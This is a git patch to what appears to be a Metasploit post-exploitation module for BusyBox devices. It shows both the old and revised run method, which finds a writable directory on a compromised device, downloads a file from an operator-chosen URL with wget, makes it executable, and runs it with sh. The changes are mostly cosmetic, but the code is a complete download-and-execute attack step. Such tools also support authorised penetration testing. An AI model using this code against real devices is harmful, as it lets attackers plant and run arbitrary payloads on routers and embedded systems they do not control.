From e7f486e43a11d023deb1334f954a0807bffe3220 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 28 Aug 2015 11:24:41 -0500
Subject: [PATCH] Review wget_exec

---
 modules/post/linux/busybox/wget_exec.rb | 48 +++++++++++--------------
 1 file changed, 21 insertions(+), 27 deletions(-)

diff --git a/modules/post/linux/busybox/wget_exec.rb b/modules/post/linux/busybox/wget_exec.rb
index c4ededd0c0..4302cd3567 100644
--- a/modules/post/linux/busybox/wget_exec.rb
+++ b/modules/post/linux/busybox/wget_exec.rb
@@ -12,49 +12,43 @@ class Metasploit3 < Msf::Post
 
   def initialize
     super(
-      'Name'         => 'BusyBox Wget and Exec',
-      'Description'  => 'This module will be applied on a session connected
-                         to a BusyBox sh shell. The script will use wget to download
-                         a file to the router or device executing BusyBox and then
-                         it executes the download file.',
+      'Name'         => 'BusyBox Download and Execute',
+      'Description'  => %q{
+        This module will be applied on a session connected to a BusyBox shell. It will use wget to
+        download and execute a file from the device running BusyBox.
+      },
       'Author'       => 'Javier Vicente Vallejo',
       'License'      => MSF_LICENSE,
-      'References'   =>
-        [
-          [ 'URL', 'http://vallejo.cc']
-        ],
       'Platform'      => ['linux'],
-       'SessionTypes'  => ['shell']
+      'SessionTypes'  => ['shell']
     )
 
     register_options(
       [
-        OptString.new('URL', [true, 'Full URL of file to download.'])
+        OptString.new('URL', [true, 'Full URL of file to download'])
       ], self.class)
   end
 
-  #
-  #The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update
-  #udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp
-  #
   def run
-    vprint_status("Trying to find writable directory.")
-    writable_directory = get_writable_directory()
+    print_status('Searching a writable direcotry...')
+    writable_directory = get_writable_directory
     if writable_directory
-      vprint_status("writable directory found, downloading file.")
-      rand_str = ""; 16.times{rand_str  << (65 + rand(25)).chr}
-      random_file_path = writable_directory + rand_str
-      cmd_exec("wget -O #{random_file_path} #{datastore['URL']}"); Rex::sleep(0.1)
+      print_status('Writable directory found, downloading file...')
+      random_file_path = "#{writable_directory}#{Rex::Text.rand_text_alpha(16)}"
+      cmd_exec("wget -O #{random_file_path} #{datastore['URL']}")
+      Rex::sleep(0.1)
+
       if file_exists(random_file_path)
-        print_good("File downloaded using wget. Executing it.")
-        cmd_exec("chmod 777 #{random_file_path}"); Rex::sleep(0.1)
-        vprint_status(cmd_exec("sh #{random_file_path}"))
+        print_good('File downloaded, executing...')
+        cmd_exec("chmod 777 #{random_file_path}")
+        Rex::sleep(0.1)
+        res = cmd_exec("sh #{random_file_path}")
+        vprint_status(res)
       else
-        print_error("Unable to download file.")
+        print_error('Unable to download file')
       end
     else
-      print_error("Writable directory not found.")
+      print_error('Writable directory not found')
     end
   end
-
 end